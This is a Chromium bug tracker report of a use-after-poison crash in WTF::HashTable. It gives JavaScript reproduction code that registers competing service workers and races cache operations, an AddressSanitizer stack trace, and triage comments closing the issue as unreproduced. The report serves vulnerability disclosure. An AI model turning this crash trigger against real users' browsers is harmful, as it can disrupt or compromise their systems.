Security: Service Worker - Use After Poison in WTF::HashTable
Reported by
loobeny...@gmail.com,
Oct 6 2016
Issue descriptionVULNERABILITY DETAILS Steps to reproduce: 1. Run server side script UAP_lookup_Repro.js in Node.js (node UAP_lookup_Repro.js ). 2. Enter http://localhost:12345 in Chrome browser ASAN build. 3. ASAN reports a Use After Poison in WTF::HashTable. SUMMARY: AddressSanitizer: use-after-poison C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\HashTable.h:679 in WTF::HashTable<const blink::LayoutObject *,WTF::KeyValuePair<const blink::LayoutObject *,std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > >,WTF::KeyValuePairKeyExtractor,WTF::PtrHash<const blink::LayoutObject>,WTF::HashMapValueTraits<WTF::HashTraits<const blink::LayoutObject *>,WTF::HashTraits<std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > > >,WTF::HashTraits<const blink::LayoutObject *>,WTF::PartitionAllocator>::lookup<WTF::IdentityHashTranslator<WTF::PtrHash<const blink::LayoutObject> >,const blink::LayoutObject *> VERSION Chrome Version: Chromium 55.0.2877.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-coverage-win32-release-422171.zip?generation=1475283769780000&alt=media ) Operating System: Windows 10 REPRODUCTION CASE (full server code in UAP_lookup_Repro.js) var MainPageCode = '<html><script>var svcWorkerReg0,svcWorker0;var svcWorkerReg1,svcWorker1; \n'; MainPageCode += 'navigator.serviceWorker.register("/svcworker0.js", {scope: "/"}).then(function(registration) {svcWorkerReg0 = registration; if(registration.installing) {svcWorker0 = registration.installing;}else if(registration.waiting){svcWorker0 = registration.waiting;}else if (registration.active){svcWorker0= registration.active;}\n'; MainPageCode += 'svcWorkerReg0.onupdatefound = function listener7(event) { if(svcWorkerReg1!=undefined) svcWorkerReg1.update();}\n'; MainPageCode += ' navigator.serviceWorker.register("/svcworker1.js", {scope: 
"/"}).then(function(registration) {svcWorkerReg1 = registration; if(registration.installing) {svcWorker1 = registration.installing;}else if(registration.waiting){svcWorker1 = registration.waiting;}else if (registration.active){svcWorker1= registration.active;}\n'; MainPageCode += ' }).catch(function(error) { });}).catch(function(error) { if(svcWorkerReg1!=undefined) svcWorkerReg1.update();});\n'; MainPageCode += ' setTimeout(function(){location.reload()},150);</script></html>\n'; var svcworkercode0 = 'var cache1;var cache2; this.onactivate = function(event) {caches.open("cacheName0").then(function(cache) {cache2=cache;}).catch(function(error) {});}\n'; svcworkercode0 += 'caches.open("cacheName0").then(function(cache) {cache2=cache;}).catch(function(error) {});\n'; svcworkercode0 += 'try{ caches.delete("cacheName2").then(function(e) {}).catch(function(error) {}); }catch(e){}\n'; svcworkercode0 += 'caches.open("cacheName2").then(function(cache) {}).catch(function(error) {\n'; svcworkercode0 += 'skipWaiting().then(function(res) {}).catch(function(error) {});\n'; svcworkercode0 += 'clients.claim().then(function(e) {}).catch(function(error) {});\n'; svcworkercode0 += 'caches.open("cacheName0").then(function(cache) {cache1=cache;}).catch(function(error) {});\n'; svcworkercode0 += 'try{ caches.delete("cacheName0").then(function(e) {}).catch(function(error) {}); }catch(e){}});\n'; var svcworkercode1 = 'caches.has("cacheName0").then(function(e) {skipWaiting().then(function(res) {}).catch(function(error) {}); \n'; svcworkercode1 += ' caches.keys().then(function(e) {}).catch(function(error) {});\n'; svcworkercode1 += 'try{ caches.delete("cacheName2").then(function(e) {}).catch(function(error) {}); }catch(e){}\n'; svcworkercode1 += 'clients.claim().then(function(e) {}).catch(function(error) {});}).catch(function(error) {});\n'; FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: tab Crash State: 
================================================================= ==36828==ERROR: AddressSanitizer: use-after-poison on address 0x275b53f4 at pc 0x1a780b78 bp 0x297fd594 sp 0x297fd588 READ of size 4 at 0x275b53f4 thread T2384 ==36828==WARNING: Failed to use and restart external symbolizer! ==36828==*** WARNING: Failed to initialize DbgHelp! *** ==36828==*** Most likely this means that the app is already *** ==36828==*** using DbgHelp, possibly with incompatible flags. *** ==36828==*** Due to technical reasons, symbolization might crash *** ==36828==*** or produce wrong results. *** #0 0x1a780b77 in WTF::HashTable<const blink::LayoutObject *,WTF::KeyValuePair<const blink::LayoutObject *,std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > >,WTF::KeyValuePairKeyExtractor,WTF::PtrHash<const blink::LayoutObject>,WTF::HashMapValueTraits<WTF::HashTraits<const blink::LayoutObject *>,WTF::HashTraits<std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > > >,WTF::HashTraits<const blink::LayoutObject *>,WTF::PartitionAllocator>::lookup<WTF::IdentityHashTranslator<WTF::PtrHash<const blink::LayoutObject> >,const blink::LayoutObject *> C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\HashTable.h:679 #1 0x1ba592d5 in blink::ServiceWorkerGlobalScopeClient::from C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerGlobalScopeClient.cpp:44 #2 0x1ba59a42 in blink::WaitUntilObserver::decrementPendingActivity C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\WaitUntilObserver.cpp:158 #3 0x1ba5999c in blink::WaitUntilObserver::didDispatchEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\WaitUntilObserver.cpp:103 #4 0x1ba321b4 in blink::ServiceWorkerGlobalScope::dispatchExtendableEvent 
C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerGlobalScope.cpp:197 #5 0x1e35d4a8 in blink::ServiceWorkerGlobalScopeProxy::dispatchInstallEvent C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\ServiceWorkerGlobalScopeProxy.cpp:192 #6 0x1c61695a in content::ServiceWorkerContextClient::OnInstallEvent C:\b\c\b\win_asan_release\src\content\renderer\service_worker\service_worker_context_client.cc:794 #7 0x1c616541 in IPC::MessageT<ServiceWorkerMsg_InstallEvent_Meta,std::tuple<int>,void>::Dispatch<content::ServiceWorkerContextClient,content::ServiceWorkerContextClient,void,void (content::ServiceWorkerContextClient::*)(int) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120 #8 0x1c612a1a in content::ServiceWorkerContextClient::OnMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\service_worker\service_worker_context_client.cc:256 #9 0x1c5d4086 in IPC::MessageT<EmbeddedWorkerContextMsg_MessageToWorker_Meta,std::tuple<int,int,IPC::Message>,void>::Dispatch<content::ServiceWorkerContextClient,content::ServiceWorkerContextMessageFilter,void,void (content::ServiceWorkerContextClient::*)(int, int, const IPC::Message &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120 #10 0x1c5d3cab in content::ServiceWorkerContextMessageFilter::OnFilteredMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\service_worker\service_worker_context_message_filter.cc:36 #11 0x1873eee1 in content::WorkerThreadMessageFilter::OnMessageReceived C:\b\c\b\win_asan_release\src\content\child\worker_thread_message_filter.cc:44 #12 0x105aecfe in base::internal::Invoker<base::internal::BindState<base::internal::IgnoreResultHelper<bool (content::UtilityProcessHostClient::*)(const IPC::Message &) __attribute__((thiscall))>,scoped_refptr<content::UtilityProcessHostClient>,IPC::Message>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340 #13 
0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #14 0x18a28c1c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #15 0x18a24b0b in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #16 0x18a2c6ae in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #17 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #18 0x14cc0a17 in base::MessageLoop::RunTask C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:405 #19 0x14cc237c in base::MessageLoop::DoWork C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:511 #20 0x14e6bcb4 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #21 0x14cbfed1 in base::MessageLoop::RunHandler C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:370 #22 0x14d49d7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #23 0x14d490ea in base::Thread::Run C:\b\c\b\win_asan_release\src\base\threading\thread.cc:245 #24 0x14d494a9 in base::Thread::ThreadMain C:\b\c\b\win_asan_release\src\base\threading\thread.cc:333 #25 0x14c37616 in base::`anonymous namespace'::ThreadFunc C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:84 #26 0x24bb0cd in __asan::AsanThread::ThreadStart e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_thread.cc:250 #27 0x24b656d in asan_thread_start 
e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:113 #28 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3) #29 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608) #30 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3) Address 0x275b53f4 is a wild pointer. SUMMARY: AddressSanitizer: use-after-poison C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\wtf\HashTable.h:679 in WTF::HashTable<const blink::LayoutObject *,WTF::KeyValuePair<const blink::LayoutObject *,std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > >,WTF::KeyValuePairKeyExtractor,WTF::PtrHash<const blink::LayoutObject>,WTF::HashMapValueTraits<WTF::HashTraits<const blink::LayoutObject *>,WTF::HashTraits<std::unique_ptr<blink::ObjectPaintProperties,std::default_delete<blink::ObjectPaintProperties> > > >,WTF::HashTraits<const blink::LayoutObject *>,WTF::PartitionAllocator>::lookup<WTF::IdentityHashTranslator<WTF::PtrHash<const blink::LayoutObject> >,const blink::LayoutObject *> Shadow bytes around the buggy address: 0x34eb6a20: 04 00 00 00 00 04 00 00 00 00 04 00 00 00 00 04 0x34eb6a30: 00 00 00 00 04 00 00 00 00 04 00 00 00 00 04 00 0x34eb6a40: 00 00 00 04 00 00 00 00 04 00 00 00 00 04 00 00 0x34eb6a50: 00 00 00 04 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 0x34eb6a60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 =>0x34eb6a70: f7 f7 f7 f7 f7 f7 00 00 00 00 00 00 00 04[f7]f7 0x34eb6a80: f7 f7 f7 00 00 00 00 00 00 00 04 00 00 00 00 00 0x34eb6a90: 04 00 00 00 00 04 00 00 00 00 00 00 04 00 00 00 0x34eb6aa0: 00 04 00 00 00 00 00 00 04 00 00 00 00 00 00 00 0x34eb6ab0: 04 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 0x34eb6ac0: 00 00 00 00 04 00 00 00 00 00 04 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 
04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Thread T2384 created by T0 here: #0 0x24b6602 in __asan_wrap_CreateThread e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:123 #1 0x14c36e8c in base::PlatformThread::CreateWithPriority C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:193 #2 0x14d48215 in base::Thread::StartWithOptions C:\b\c\b\win_asan_release\src\base\threading\thread.cc:112 #3 0x18854659 in blink::scheduler::WebThreadImplForWorkerScheduler::WebThreadImplForWorkerScheduler C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_impl_for_worker_scheduler.cc:31 #4 0x188543d8 in blink::scheduler::WebThreadImplForWorkerScheduler::WebThreadImplForWorkerScheduler C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_impl_for_worker_scheduler.cc:25 #5 0x1866260c in content::BlinkPlatformImpl::createThread C:\b\c\b\win_asan_release\src\content\child\blink_platform_impl.cc:448 #6 0x1e1184cd in blink::WebThreadSupportingGC::WebThreadSupportingGC C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:37 #7 0x1e118379 in blink::WebThreadSupportingGC::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:17 #8 0x1aebb8b1 in blink::WorkerBackingThread::WorkerBackingThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerBackingThread.cpp:51 #9 0x1e7942a4 in blink::ServiceWorkerThread::ServiceWorkerThread 
C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerThread.cpp:48 #10 0x1e794072 in blink::ServiceWorkerThread::create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\modules\serviceworkers\ServiceWorkerThread.cpp:43 #11 0x1e34730e in blink::WebEmbeddedWorkerImpl::startWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\web\WebEmbeddedWorkerImpl.cpp:447 #12 0x1c5853cb in content::EmbeddedWorkerDispatcher::OnResumeAfterDownload C:\b\c\b\win_asan_release\src\content\renderer\service_worker\embedded_worker_dispatcher.cc:106 #13 0x1c584f93 in IPC::MessageT<EmbeddedWorkerMsg_ResumeAfterDownload_Meta,std::tuple<int>,void>::Dispatch<content::EmbeddedWorkerDispatcher,content::EmbeddedWorkerDispatcher,void,void (content::EmbeddedWorkerDispatcher::*)(int) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120 #14 0x1c583609 in content::EmbeddedWorkerDispatcher::OnMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\service_worker\embedded_worker_dispatcher.cc:48 #15 0x1c34194b in content::RenderThreadImpl::OnControlMessageReceived C:\b\c\b\win_asan_release\src\content\renderer\render_thread_impl.cc:1717 #16 0x18670624 in content::ChildThreadImpl::OnMessageReceived C:\b\c\b\win_asan_release\src\content\child\child_thread_impl.cc:794 #17 0x14ef1827 in IPC::ChannelProxy::Context::OnDispatchMessage C:\b\c\b\win_asan_release\src\ipc\ipc_channel_proxy.cc:339 #18 0x105aecfe in base::internal::Invoker<base::internal::BindState<base::internal::IgnoreResultHelper<bool (content::UtilityProcessHostClient::*)(const IPC::Message &) __attribute__((thiscall))>,scoped_refptr<content::UtilityProcessHostClient>,IPC::Message>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340 #19 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #20 0x18a28c1c in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue 
C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:344 #21 0x18a24b0b in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:240 #22 0x18a2c6ae in base::internal::Invoker<base::internal::BindState<void (blink::scheduler::TaskQueueManager::*)(base::TimeTicks, bool) __attribute__((thiscall)),base::WeakPtr<blink::scheduler::TaskQueueManager>,base::TimeTicks,bool>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:332 #23 0x14e629a6 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:54 #24 0x14cc0a17 in base::MessageLoop::RunTask C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:405 #25 0x14cc237c in base::MessageLoop::DoWork C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:511 #26 0x14e6bcb4 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:35 #27 0x14cbfed1 in base::MessageLoop::RunHandler C:\b\c\b\Win_ASan_Release\src\base\message_loop\message_loop.cc:370 #28 0x14d49d7e in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:35 #29 0x1c2e5bcf in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:198 #30 0x14b357e3 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:418 #31 0x14b37065 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:786 #32 0x14b35334 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20 #33 0xf2f11b8 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:97 #34 0x13ea895 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:174 #35 0x13e1b0c in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:245 #36 0x24c7332 in 
__scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253 #37 0x75aa62c3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x162c3) #38 0x77dd0608 in RtlSubscribeWnfStateChangeNotification+0x438 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x60608) #39 0x77dd05d3 in RtlSubscribeWnfStateChangeNotification+0x403 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x605d3) ==36828==ABORTING
Oct 6 2016
NM, I can't read, you said it was 55.0.2877.0, can you confirm with .2883 ?
Oct 14 2016
I cannot reproduce it either. Closing the issue due to a lack of response from the reporter. Please feel free to re-open if you have additional information.
Jan 21 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by tsepez@chromium.org
, Oct 6 2016